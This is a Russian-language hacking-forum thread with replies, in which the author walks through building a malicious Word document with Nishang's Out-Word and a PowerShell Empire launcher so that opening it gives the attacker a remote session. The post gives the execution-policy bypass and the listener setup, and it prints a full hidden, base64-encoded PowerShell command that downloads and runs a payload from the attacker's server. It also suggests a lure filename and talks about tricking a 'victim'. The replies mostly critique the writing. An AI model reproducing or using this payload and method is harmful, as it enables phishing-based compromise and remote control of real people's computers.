ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   PowerShell Nishang (https://forum.antichat.xyz/showthread.php?t=458421)

BabaDook 06.12.2017 04:28

PowerShell Nishang


В продолжении темы о рассмотрение PowerShell скриптов от Nishang было бы логично кратко рассмотреть применение каждого из сценария.

Цитата:

Сообщение от None
Данная статья носит исключительно информационный характер. никто кроме вас не несет никакой ответственности за ваши действия.

По сегодняшнему сценарию будет рассмотрено сразу несколько скриптов, весь дополнительный материял будет ниже.

Первым делом надо получить доступ к жертве. Дальше выполнить пост эксплуатацию, надо понимать что от того что мы хотим зависят наши действия.

В статье будут рассмотренысамые банальные , простые примерчики, однако вам не стоит ограничивать свой кругозор только примерами этими.

Для удобство я разбил на несколько действий данную атаку, можно даже на подкатегории разбивать для удобства.

С начало нам необходимо приготовить нагрузку, сервера, как-то доставить до жертвы да и ещё что бы наше зло было выполнено..

Начнём накидывать план

1) сгенерируем вредоносный док файл

2) настроим сервер с которого будет скачен Evil FilE

3) доставка на машину жертвы

4) выполненние когда

5) забрать(просмотреть) результат

Не буду ходить возле да около сразу перейду к делу.

Первый делом включим возможность исполнение PowerShell и импортируем сценарии

Set-ExecutionPolicy Bypass

Теперь необходимо импортировать сценарии. Nishang даёт на можножность имортировать как отдельные сценарии так и все сразу. Принцеп действий от этого не меняется поэтому для удобство я импортирую все сразу. переходим в дирикторию и выполняем команду:

Import-Module .\nishang.psm1

http://s018.radikal.ru/i507/1712/7c/9c3b2c16266c.png

Просмотр краткой справки по возможностям сценариев

Get-Help nishang

http://s008.radikal.ru/i305/1712/af/2b67788d4b30.png

Можно так же просмотреть доступные команды

Get-Command -Module nishang

http://s019.radikal.ru/i629/1712/11/0d5d86600a4a.png

Нам интересен следующий сценарий герерации вредоносного документа Out-Word

информацию о нём можно получить командой

Get-Help Out-Word И полную справку Get-Help Out-Word -full

Всё достаточно просто

Но, тут надо уже определиться с нагрузкой, методом её доставки на жертву. Для примера я буду использовать Empire. Можно метасплоит использовать можно другое ПО, всё ограниченно только вашими рамами.

Скачиваем инструмент:

github.com/EmpireProject/Empire

Настройки принимающей стороны

listeners

Указываем IP

У меня будет http://192.168.1.66:8080

Так как запущен ещё веб сервер.Имя оставлю стандартным тест.

После настроек выполняем команду: execute usestager launcher

Самый распространенный стейджер – launcher

usestager launcher test

В выводе получаем закодированную powershell команду в base64, которую необходимо выполнить на стороне жертвы.

Копируем в буфер обмена.

http://s018.radikal.ru/i512/1712/9e/74cdf7662e7a.png

Подготовка к генерации док файла подошла к финалу.Теперь следует сгенерировать его и всем доступными методами заставить жертву открыть документ.

В коне POwershell выполняем команду

Цитата:

Сообщение от None
Out-Word "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAUwB0AEUAbQAuAE4AZQB0AC4AUwBFAFIAdgBpAGMARQ BQAE8ASQBOAFQATQBhAE4AQQBnAGUAUgBdADoAOgBFAHgAcABF AEMAVAAxADAAMABDAE8ATgB0AEkATgB1AEUAIAA9ACAAMAA7AC QAdwBDAD0ATgBlAHcALQBPAEIAagBlAGMAdAAgAFMAeQBTAHQA RQBtAC4ATgBlAHQALgBXAGUAYgBDAEwASQBlAE4AVAA7ACQAdQ A9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBk AG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7AC AAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEA LgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAYw AuAEgARQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAt AEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAcgBvAF gAWQAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBlAHQALgBXAEUA YgBSAEUAUQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVw BFAGIAUAByAG8AWAB5ADsAJABXAEMALgBQAHIATwBYAHkALgBD AHIARQBEAGUAbgBUAEkAYQBsAFMAIAA9ACAAWwBTAHkAUwBUAG UAbQAuAE4ARQBUAC4AQwBSAEUARABFAG4AVABpAEEAbABDAEEA QwBoAGUAXQA6ADoARABFAEYAQQBVAGwAVABOAGUAdAB3AE8Acg BLAEMAUgBFAEQAZQBOAHQASQBhAEwAcwA7ACQASwA9ACcAcQBU AGwAYQA8AEkAZABqAEAAOwAwACoAIwBrAHgATAAvAGAALgBCAD YAdABQAH0AXABzAHwAXQB+ACkAWAA5ACcAOwAkAGkAPQAwADsA WwBDAGgAQQByAFsAXQBdACQAQgA9ACgAWwBDAGgAQQByAFsAXQ BdACgAJABXAEMALgBEAG8AVwBuAGwAbwBBAGQAUwBUAFIASQBO AGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuAD EALgA2ADYAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAA IgApACkAKQB8ACUAewAkAF8ALQBCAFgATwByACQASwBbACQAaQ ArACsAJQAkAEsALgBMAEUAbgBnAHQASABdAH0AOwBJAEUAWAAg ACgAJABiAC0ASgBvAGkATgAnACcAKQA="

Полученный файл будет находиться по пути nishang\Salary_Details.doc.

Сейчас самый сложный этап, надо подсунуть документ жертве. Вариантов может быть великое множество.Для нашего примера я не буду ничего придумывать с этим этапом, а просто запущу, так как это не цель. Но в следущей статье обязательно будут примеры этого этапа.

http://s014.radikal.ru/i328/1712/4c/ec56adf08782.png

Как вариант, ну не стану я говорить что ломаю правительственные сайты, но кто знает , надо логи смотреть. Как видно я назвал наш вайл ha.doc именно он и будет загружен. После скачивания и запуска на машину хакера прилетает агент(рабочая ссесия) на на стороне жертвы открывается такой документ.

Текст "Microsoft Word 2013 This document was edited in a different version of Microsoft Word.

To load the document, please Enable Content"

Формируется генерирующим сценарием

http://i069.radikal.ru/1712/d6/7e0302940af6.png

Командой interact завершаем этот текст.

Сылки по теме

.SpoilerTarget" type="button">Spoiler
https://www.powershellempire.com/

https://github.com/samratashok/nishang

VKAPI 04.01.2018 01:12

а реверснуть действия можно ?

BabaDook 06.01.2018 02:39

Цитата:

Сообщение от VKAPI

а реверснуть действия можно ?

не понял твоего вопроса .

-=lebed=- 06.01.2018 12:46

1. Орф. ошибки это плохо (исправь сам).

2. Рекомендации по написанию статей проигнорированы полностью (структура отсутствует).

3. Что, зачем и почему делаем непонятно, статья напоминает мою про WMF-баг, с отличием того что генерим вредоносный doc-файл и используем произвольные способы доставки.

4. Продолжение статьи - не есть статья, лучше бы объединить или сослаться хотя-бы на начало, чтоб понять предмет обсуждения.

5. Power Shell vs CMD? - из статьи непонятно какая уязвимость эксплуатируется.

6. Сравни свою статью с этой например: https://habrahabr.ru/post/113913/ и почувствуй разницу.

Резюме: статья требует доработки, моя оценка 3 с натяжкой.

P.S. Всё вышеизложенное является личным мнением (фантазией автора) и не претендует на объективную оценку.

Veil 06.01.2018 23:09

Цитата:

Сообщение от -=lebed=-

1. Орф. ошибки это плохо (исправь сам).
2. Рекомендации по написанию статей проигнорированы полностью (структура отсутствует).
3. Что, зачем и почему делаем непонятно, статья напоминает мою про WMF-баг, с отличием того что генерим вредоносный doc-файл и используем произвольные способы доставки.
4. Продолжение статьи - не есть статья, лучше бы объединить или сослаться хотя-бы на начало, чтоб понять предмет обсуждения.
5. Power Shell vs CMD? - из статьи непонятно какая уязвимость эксплуатируется.
6. Сравни свою статью с этой например:
https://habrahabr.ru/post/113913/
и почувствуй разницу.
Резюме: статья требует доработки, моя оценка 3 с натяжкой.
P.S. Всё вышеизложенное является личным мнением (фантазией автора) и не претендует на объективную оценку.

Лебедь, ты что там в последнее время куришь?

Kevin Shindel 10.01.2018 23:11

Голосовал за БадаБука! Поздравляю братан!

BabaDook 10.01.2018 23:40

Всем большое спасибо. Попробую написать Следующую статейку

CyberTro1n 11.01.2018 00:27

Цитата:

Сообщение от BabaDook

Всем большое спасибо. Попробую написать Следующую статейку

Хоть какая то движуха пошла. На самом деле все молодцы) Я бы остальным какой нибудь бонус накинул за труд)

Veil 11.01.2018 00:30

Цитата:

Сообщение от BabaDook

Всем большое спасибо. Попробую написать Следующую статейку

Давай бро, ждем.


Время: 16:07